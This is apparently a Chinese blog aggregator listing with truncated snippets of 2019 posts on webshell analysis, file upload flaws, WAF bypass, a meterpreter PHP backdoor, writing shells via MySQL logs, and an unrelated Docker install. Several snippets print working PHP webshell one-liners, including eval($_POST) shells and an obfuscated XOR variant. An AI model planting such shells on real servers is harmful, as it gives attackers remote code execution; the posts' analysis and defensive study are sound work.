WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").(" ...
分类:
Web程序 时间:
2019-10-31 13:27:58
阅读次数:
147
查看配置 开启日志功能 设置日志存储路径 ; 执行sql语句,写入日志文件 成功写入 ...
分类:
数据库 时间:
2019-10-31 10:31:08
阅读次数:
159
WebShell代码分析溯源(二) 一、一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二、代码分析 1、调整代码格式 2、分析代码,首先先把”assert”字符串 ...
分类:
Web程序 时间:
2019-10-30 13:44:25
阅读次数:
93
1、漏洞描述:文件上传漏洞,是指可以利用WEB上传一些特定的文件包含特定代码如(<?php phpnfo;?> 可以用于读取服务器配置信息。上传成功后可以点击) 上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。文件上传本身是web中最为常见的一种功能需求,关 ...
分类:
Web程序 时间:
2019-10-27 10:50:52
阅读次数:
325
PHP-WebShell-Bypass-WAF PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码: <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?> WebShell 的输入点在$_GET 和$ ...
分类:
Web程序 时间:
2019-10-20 11:10:22
阅读次数:
121
今天看到的文章,特地记录,非常的好,关于取反操作,之前记录过一篇无字幕webshell,suctf中也有类似题目 ...
分类:
Web程序 时间:
2019-10-19 23:28:08
阅读次数:
506
一、PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell pa ...
分类:
Web程序 时间:
2019-10-10 15:36:22
阅读次数:
130
1. PHP基础 ①eval(字符串)函数:把字符串按照PHP代码执行,该字符串必须是合法的PHP代码,且以分号结尾: ②assert()函数:如果参数是字符串,它将会被assert()当做PHP代码来执行,跟eval()类似: ③system()函数,执行外部程序,并且显示输出: ④exec()函 ...
分类:
Web程序 时间:
2019-10-06 16:30:36
阅读次数:
139
数据库在线导出工具:Adminer Adminer是一个类似PhpMyAdmin的MySQL客户端的“页面PHP”,它只有一个PHP文件,包括:数据库的普通和函数操作等功能,是一个强大的类似型webShell工具 使用方法: :https://www.github.com/vrana/adminer ...
分类:
数据库 时间:
2019-10-06 09:58:29
阅读次数:
284
本文使用的Docker是社区版,版本是19.03.2,这个版本是本文写时的最新版。 昨天新购了腾讯云的Linux服务器,所以记录下第一次安装Docker。直接用WebShell登录linux在浏览器执行命令即可。 1. 安装deltarpm yum provides '*/applydeltarpm ...
分类:
其他好文 时间:
2019-10-03 12:32:51
阅读次数:
407
